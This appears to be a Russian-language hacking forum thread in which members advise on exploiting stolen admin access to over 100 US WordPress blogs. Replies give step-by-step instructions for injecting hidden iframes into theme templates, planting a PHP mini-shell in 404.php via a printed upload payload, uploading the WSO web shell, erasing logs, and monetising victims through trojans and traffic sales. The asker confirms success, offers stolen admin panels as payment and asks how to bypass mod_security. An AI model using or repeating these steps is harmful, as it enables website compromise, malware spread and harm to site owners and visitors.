Есть более 100 блогов на водрпрес.Полный доступ к админкам(логин/пас).Блоги USA.
Вопрос.
1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода?
2.Возможно ли залить шелл?
3.Что вобще можна выжать в материальном плане?
За дельный ответ отдам пару админок с PR.
Заранее благодарен.

Цитата:

Сообщение от comynicator

1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода?

iFrame вставляется =)
Вставляется куда-нибудь подальше, но что подключается везде =)

Цитата:

Сообщение от comynicator

2.Возможно ли залить шелл?

Доступ к админке есть - вперёд! Лей, только не забудь попрятать его, изменять touch time, затирать логи и прочее.

Цитата:

Сообщение от comynicator

3.Что вобще можна выжать в материальном плане?

Троянить, партнёрка, тизер (палевно, но возможно), трафик... =)

Цитата:

Сообщение от comynicator

Есть более 100 блогов на водрпрес.Полный доступ к админкам(логин/пас).Блоги USA.
Вопрос.
1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода?
2.Возможно ли залить шелл?
3.Что вобще можна выжать в материальном плане?
За дельный ответ отдам пару админок с PR.
Заранее благодарен.

1) Да, ты сможешь вставить свой фрейм через шаблоны. Если код фрейма не появится на странице - может быть несколько проблем:
а) Страницы кешируются, для этого найди папку с кэшем и удали её.
б) Ты вставил код не в тот шаблон.
в) Файл шаблона не может быть отредактирован, так-как защищен от записи.
Примечание: я не рекомендую его использовать, так-как гугл и яндекс плохо реагируют на это, а так же, некоторые антивирусы могут тоже ругаться на него.

2) Да, залить шелл вполне возможно. Для этого перейди в режим редактирования шаблона, выбери любой файл шаблона, к примеру 404.php и вставь в начало кода такую строчку:

code:



Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:

code:

?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5

3) Если на сайте хорошие показатели Тиц и ПР - можно выжать деньги, рекомендую использовать сайты с тиц не меньше чем 100 и пр не меньше чем 1, желательно, чтобы пр был 3 и больше, но все же. Так же рекомендовано, чтобы сайт был в яндекс каталоге и DMOZ, а так же имел более 100 проиндексированных страниц в яндексе, все эти параметры повышают число $$$, которые ты с них выжмешь.
Так же можно сливать трафик с гугла и яндекса или же с других поисковых системах. Если понадобится код - могу написать под твои потребности, да и много кода там не понадобится.

Если что-то не понятно или требуется помощь - пиши, буду рад помочь.
------------------------------------------------------------------------------------------------------
UpDate:

Цитата:

Сообщение от _Werewolf_

iFrame вставляется =)

Немного добавлю от себя, если все же нужно вставить фрейм - лучше его ещё запихнуть под невидимый блок:

Так-как на странице он будет отображаться как небольшой квадратик.

Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:
code:
?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5

А можно ли подробнее вот на даном примере?
Допустим куда именно вставить минишелл?




Công Ty Nhà Đẹp

В даной теме я полный нуб.Если возможно покажите на даном примере что именно менять?

К примеру вот так

code:



Công Ty Nhà Đẹp

Прям интересно стало - зачем залить eval() и через него извращаться с формой?
Ладно, частью согласен - удалит шелл админ, а ты новый грузанёшь =) Но: он же и код найдёт и/или права выставит правильные. Тем более нужно создавать не cmd, а сложночитаемую хрень, а то запалишься =) Да и запросы в логах есть - чувака с наличием хотя бы костного мозга должно настрожить то, что к такому файлу идут такие GET-переменные. Плюс ко всему с таким палевным именем.

Цитата:

Сообщение от _Werewolf_

Прям интересно стало - зачем залить eval() и через него извращаться с формой?
Ладно, частью согласен - удалит шелл админ, а ты новый грузанёшь =) Но: он же и код найдёт и/или права выставит правильные. Тем более нужно создавать не cmd, а сложночитаемую хрень, а то запалишься =) Да и запросы в логах есть - чувака с наличием хотя бы костного мозга должно настрожить то, что к такому файлу идут такие GET-переменные. Плюс ко всему с таким палевным именем.

Цель была залить шелл, а не спрятать его -)

И все же какой именно из stylesheet заменить на то что вы указали?И как это должно выглядеть?Могу дать админку с даного примера.

Цитата:

Сообщение от comynicator

И все же какой именно из stylesheet заменить на то что вы указали?И как это должно выглядеть?Могу дать админку с даного примера.

Вставлять код мини-шелла нужно в любом файле с расширением *.php
[/URL][URL="https://hpc.name/redirector.html#http://mflood.co.ua/images/uploads/2014-01-19_230427_838.png"] (https://hpc.name/redirector.html#http://mflood.co.ua/images/uploads/2014-01-19_230427_838.png)IMAGE (https://hpc.name/redirector.html#http://mflood.co.ua/images/uploads/2014-01-19_230427_838.png) http://mflood.co.ua/images/uploads/2014-01-19_230427_838.png

Спасибо огромное всем кто ответил и разжевал.Отдельно ZoRKeG
Наконец то появилась форма загрузки
Минишелл залил в 404.php
В форму для загрузки залил wso.
А вот как найти путь к шелу(WSO)?Так понимаю где то в уплоад?
Если нада еще админки-поделюсь.

Цитата:

Сообщение от comynicator

Спасибо огромное всем кто ответил и разжевал.Отдельно ZoRKeG
Наконец то появилась форма загрузки
Минишелл залил в 404.php
В форму для загрузки залил wso.
А вот как найти путь к шелу(WSO)?Так понимаю где то в уплоад?
Если нада еще админки-поделюсь.

Все файлы, которые ты зальешь через ту форму загружаются в ту же папку где и сам файл с твоим мини-шеллом, с таким же названием как и у тебя на компьютере.
Иными словами, просто замени в адресной строке название файла с твоим мини-шеллом на названием твоего шелла, который ты залил

Все разобрался вроде.Ща еще админку с pr-3 в личку кину.

Цитата:

Сообщение от comynicator

ифрейм код

А трафа сколько там?Знакомый связку в аренду взял,траф нужен.Можно поработать.

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security

Так понял нет прав на запись?Причем пробовал уже админок 20.
Есть ли способ обойти как то этот мод секюрити?Или какие другие способы заливки полноценного шелла.Минишелл могу прописать в любом php файле,а если сразу кудато сохранить код допустим WSO будет ли возможность его выполнить?
А по поводу фрейма код в шапку пихать?

Цитата:

Сообщение от MaCroSs

А трафа сколько там?Знакомый связку в аренду взял,траф нужен.Можно поработать.

На щет трафика-не смотрел точно.Щас интересует нашарится шеллы лить.В ознакомительных целях.
Блоги 95% юсовские.Какое количество трафа вобще интересует?Может найду что с посещалкой посотрудничать не против.

Цитата:

Сообщение от comynicator

На щет трафика-не смотрел точно.Щас интересует нашарится шеллы лить.В ознакомительных целях.
Блоги 95% юсовские.Какое количество трафа вобще интересует?Может найду что с посещалкой посотрудничать не против.

Отписал.

Цитата:

Сообщение от ZoRKeG

1) Да, ты сможешь вставить свой фрейм через шаблоны. Если код фрейма не появится на странице - может быть несколько проблем:
а) Страницы кешируются, для этого найди папку с кэшем и удали её.
б) Ты вставил код не в тот шаблон.
в) Файл шаблона не может быть отредактирован, так-как защищен от записи.
Примечание: я не рекомендую его использовать, так-как гугл и яндекс плохо реагируют на это, а так же, некоторые антивирусы могут тоже ругаться на него.

2) Да, залить шелл вполне возможно. Для этого перейди в режим редактирования шаблона, выбери любой файл шаблона, к примеру 404.php и вставь в начало кода такую строчку:

code:



Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:

code:

?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5

3) Если на сайте хорошие показатели Тиц и ПР - можно выжать деньги, рекомендую использовать сайты с тиц не меньше чем 100 и пр не меньше чем 1, желательно, чтобы пр был 3 и больше, но все же. Так же рекомендовано, чтобы сайт был в яндекс каталоге и DMOZ, а так же имел более 100 проиндексированных страниц в яндексе, все эти параметры повышают число $$$, которые ты с них выжмешь.
Так же можно сливать трафик с гугла и яндекса или же с других поисковых системах. Если понадобится код - могу написать под твои потребности, да и много кода там не понадобится.

Если что-то не понятно или требуется помощь - пиши, буду рад помочь.
------------------------------------------------------------------------------------------------------
UpDate:

Немного добавлю от себя, если все же нужно вставить фрейм - лучше его ещё запихнуть под невидимый блок:

Так-как на странице он будет отображаться как небольшой квадратик.

Как можно пофиксить php upload? То есть
Я понимаю тема старая, и поднимаю по пустяку, но всё-же интересно знать.

здравствуйте, подскажите пожалуйста как найти доступ к админ панели сайта на wordpress
www.baby-smile.ru (https://hpc.name/redirector.html#http://www.baby-smile.ru)
Стандартный путь что-то не работает, видимо изменен как-то.
Спасибо.

Цитата:

Сообщение от otoko212

здравствуйте, подскажите пожалуйста как найти доступ к админ панели сайта на wordpress
www.baby-smile.ru (https://hpc.name/redirector.html#http://www.baby-smile.ru)
Стандартный путь что-то не работает, видимо изменен как-то.
Спасибо.

Может потому что это не wordpress